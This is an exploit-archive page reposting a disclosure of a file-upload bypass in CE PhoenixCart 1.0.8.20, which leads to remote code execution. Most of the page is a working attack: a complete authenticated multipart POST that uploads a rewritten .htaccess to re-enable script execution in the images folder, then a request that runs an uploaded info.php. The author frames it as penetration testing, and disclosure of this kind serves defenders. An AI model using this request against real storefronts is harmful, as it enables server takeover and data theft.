CE Phoenixcart 1.0.8.20 Shell Upload

CE Phoenixcart 1.0.8.20 Shell Upload: Posted Dec 6, 2023; Authored by nu11secur1ty; CE Phoenixcart version 1.0.8.20 suffers from a remote shell upload vulnerability.; tags | exploit, remote, shell; SHA-256 | 07b363b061bd5168064a8bc9eb0e871c0ae4e8d96a0a87798b419cec452c6070; Download | Favorite | View

CE Phoenixcart 1.0.8.20 Shell Upload

## Title: PhoenixCart-1.0.8.20-File-Upload-Bypass-override-htaccess-security-RCE
## Author: nu11secur1ty
## Date: 12/06/2023
## Vendor: https://phoenixcart.org/index.php
## Software: https://github.com/CE-PhoenixCart/PhoenixCart/archive/master.zip
## Reference: https://portswigger.net/web-security/file-upload,
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The Categories/Products Product Images upload function, is ABSOLUTELY
NOT SANITIZING WELL for file uploading from any type of extension!
In this case, you can see a bypassing of .HTACCESS SECURITY file and
uploading an info.php exploit file which info.php can be executed from
everywhere for dumping the all information about the server! This can
be done on the demo server! Please do not do this! I am a Penetration
Tester, not a stupid cracker, and that's why I downloaded it,
installed it, and tested it!
If you want to test it yourself please download it, install it, and test it!
Thank you all!

STATUS: HIGH-CRITICAL Vulnerability
[+]Exploit execution:
```POST
POST /PhoenixCart/admin/catalog.php?cPath=&action=update_product&pID=10 HTTP/1.1
Host: pwnedhost7.com
Content-Length: 2952
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://pwnedhost7.com
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryeDPXR7DpYcn3eWA1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://pwnedhost7.com/PhoenixCart/admin/catalog.php?cPath=&pID=10&action=new_product
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: cepcAdminID=ukrk3ssr0jd6iqsnn9ofuccmbt
Connection: close

------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="formid"

733e378dc8154accdbfd80762cc385f48d5566560ac3b264db19393f9beb268e
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_date_added"

2023-12-06 11:36:36
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_status"

1
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_quantity"

0
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_date_available"

2023-12-14 00:00:00
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="manufacturers_id"


------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_model"


------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_tax_class_id"

1
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_price"

1000.0000
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_price_gross"

1070
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_weight"

1.00
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_gtin"

00000000000001
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_name[1]"

pwned
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_description[1]"

pwned your services
------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_url[1]"


------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_seo_title[1]"


------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_seo_description[1]"


------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_seo_keywords[1]"


------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_image_large_1";
filename=".htaccess"
Content-Type: application/octet-stream

# $Id$
#
# This is used to restrict access to this folder to anything other
# than images

# Prevents any script files from being accessed from the images folder
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
  <IfModule mod_authz_core.c>
    # Require all denied
  </IfModule>

  <IfModule !mod_authz_core.c>
    Order Deny,Allow
    # Deny from all
    Allow from all
  </IfModule>
</FilesMatch>

Options -Indexes

------WebKitFormBoundaryeDPXR7DpYcn3eWA1
Content-Disposition: form-data; name="products_image_htmlcontent_1"


------WebKitFormBoundaryeDPXR7DpYcn3eWA1--

```

[+]Response:
```PHP
GET /PhoenixCart/images/info.php HTTP/1.1
Host: pwnedhost7.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/CE-Phoenix/2023/PhoenixCart-1.0.8.20)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/12/phoenixcart-10820-file-upload-bypass.html)

## Time spent:
00:17:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Top Authors In Last 30 Days

Red Hat 286 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 6 files
Milad Karimi 4 files
Google Security Research 3 files
Adam Gowdiak 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

CE Phoenixcart 1.0.8.20 Shell Upload

CE Phoenixcart 1.0.8.20 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CE Phoenixcart 1.0.8.20 Shell Upload

Share This

CE Phoenixcart 1.0.8.20 Shell Upload

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems